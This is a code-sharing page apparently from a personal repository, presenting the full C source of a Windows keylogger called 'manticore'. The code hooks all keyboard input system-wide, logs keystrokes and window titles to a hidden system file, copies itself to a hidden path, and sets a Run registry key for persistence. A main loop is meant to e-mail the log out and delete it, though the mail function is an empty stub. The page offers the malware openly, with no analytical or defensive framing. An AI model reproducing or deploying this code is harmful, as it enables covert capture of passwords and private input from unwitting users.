Foxbond's Repo

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
BOOL logging=FALSE;
HANDLE fCap=0;//the cap file
DWORD dwCap=0;//thread ID
HANDLE hCap=0;
HHOOK lHook=0;//the log hook
HWND prevF=0;//our last focus
HMODULE hMod=0;
LRESULT __stdcall manticoreProc(int c,WPARAM w,LPARAM l)//the journal log process
{
	if(c<0) 
	{
		return CallNextHookEx(lHook,c,w,l);
	}    
	if(c==HC_ACTION)//there is a message sent to a window
	{
		EVENTMSG *eptr=(EVENTMSG *)l;
		if(eptr->message==WM_KEYDOWN)
		{
			DWORD dc,db;
			char myBuff[256];
			int virtue,ns;
			virtue=LOBYTE(eptr->paramL);
			ns=HIBYTE(eptr->paramL);
			ns<<=16;
			HWND hf=GetActiveWindow();//did focus change?
			if(prevF!=hf)
			{
				char st[256];
				int nco;
				nco=GetWindowText(hf,st,256);//get the windows text
				if(nco>0)
				{
					char myBuff[512];
					wsprintf(myBuff,"\r\n%s\r\n",st);
					WriteFile(fCap,myBuff,lstrlen(myBuff),&db,0);
				}
				prevF=hf;//last focus = prev focus
			}
			dc=GetKeyNameText(ns,myBuff,256);//gets the string representing keys name	
			if(dc)
			{
				if(virtue==VK_SPACE)
				{
					myBuff[0]=' ';
					myBuff[1]='\0';
					dc=1;
				}
				if(dc==1)
				{
					BYTE kb[256];
					WORD myword;
					int numwords;
					GetKeyboardState(kb);
					numwords=ToAscii(virtue,ns,kb,&myword,0);//translate virtual key codez
					if(numwords>0)//if one or two chars were copied to buffer
					{
						WriteFile(fCap,&myword,numwords,&db,0);
					}    				
				}
				else
				{
					WriteFile(fCap,"[",1,&db,0);
					WriteFile(fCap,myBuff,dc,&db,0);
					WriteFile(fCap,"]",1,&db,0);
					if(virtue==VK_RETURN)
					{
						WriteFile(fCap,"\r\n",2,&db,0);
					}    
				}
			}			
		}
	}
	return CallNextHookEx(lHook,c,w,l);
}
DWORD __stdcall manticoreThread(LPVOID lpv)
{
	//handle caps lock
	MSG mymsg;
	BYTE dimkeys[256];
	int i;
	for(i=0;i<256;++i) 
	{
		dimkeys[i]=0;
	}    
	prevF=0;
	fCap=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
	if(fCap==INVALID_HANDLE_VALUE)
	{
		EXIT_FAILURE;
	}
	SetFilePointer(fCap,0,0,FILE_END);
	lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);//global hook;record and watch input events
	if(lHook==0)
	{
		CloseHandle(fCap);
		fCap=0;
		return EXIT_FAILURE;
	}
	logging=TRUE;
	while(logging)
	{
		while(PeekMessage(&mymsg,0,0,0,PM_NOREMOVE))//dont remove after processing
		{
			GetMessage(&mymsg,0,0,0);//get message from calling threads queue of msgs
			if(mymsg.message==WM_CANCELJOURNAL)//user cancels app journaling
			{
				SetKeyboardState(dimkeys);//copy 256 byte array
				lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
				if(lHook==0)
				{
					CloseHandle(fCap);
					fCap=0;
					return EXIT_FAILURE;
				}
			}
			else
			{
				DispatchMessage(&mymsg);
			}
		}
		Sleep(1);
	}
	UnhookWindowsHookEx(lHook);
	CloseHandle(fCap);
	fCap=0;
	hCap=0;
	return EXIT_SUCCESS;
}
int manticoreLog(const char *file)
{
	//start the logging	
	if(logging==TRUE)
	{
		return EXIT_FAILURE;
	}
	hCap=CreateThread(0,0,manticoreThread,(LPVOID)file,0,&dwCap);
	if(hCap==0)
	{
		return EXIT_FAILURE;
	}
	if(WaitForSingleObject(hCap,5000)==WAIT_OBJECT_0)
	{
		return EXIT_FAILURE;
	}
	SetThreadPriority(hCap,THREAD_PRIORITY_LOWEST);
	return EXIT_SUCCESS;
}
bool manticoreStop()
{
	//stop the logging
	if(logging==FALSE)
	{
		return false;
	}
	logging=FALSE;
	if(WaitForSingleObject(hCap,5000)!=WAIT_OBJECT_0)
	{
		return false;
	}
	return true;
}
bool manticoreFetch(const char *server,const char *to,const char *toname,const char *from,const char *subject,const char *body,const char *attachment)
{
	//send the e-mail, should be self explanatory

	return true;
}
int __stdcall WinMain(HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nFunsterStil)
{
	if(__argc!=12)
	{
		return EXIT_FAILURE;
	}
	char filename[MAX_PATH];
	GetModuleFileName(0,filename,MAX_PATH);//get name of the running app
	SetFileAttributes(__argv[1],FILE_ATTRIBUTE_NORMAL);
	CopyFile(filename,__argv[1],false);
	if(SetFileAttributes(__argv[1],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM)==ERROR_SUCCESS)
	{
		return EXIT_FAILURE;
	}
	HKEY hklm;
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&hklm)!=ERROR_SUCCESS)
	{
		return EXIT_FAILURE;
	}
	if(RegSetValueEx(hklm,__argv[2],0,REG_SZ,(LPBYTE)__argv[3],strlen(__argv[3]))!=ERROR_SUCCESS)
	{
		return EXIT_FAILURE;
	}
	RegCloseKey(hklm);
	hMod=GetModuleHandle(0);//imperative,without this keylogging wolnt work.
	while(true)
	{
		manticoreLog(__argv[4]);
		Sleep(atoi(__argv[5]));
		manticoreStop();
		DWORD ThreadID;
		if(InternetGetConnectedState(&ThreadID,0)==true)//are we connected to internet?
		{
			manticoreFetch(__argv[6],__argv[7],__argv[8],__argv[9],__argv[10],__argv[11],__argv[4]);//e-mail the file
			DeleteFile(__argv[4]);
		}
	}
	return EXIT_SUCCESS;
}

> Back

foxbond@o2.pl | Running on Foxbond µFramework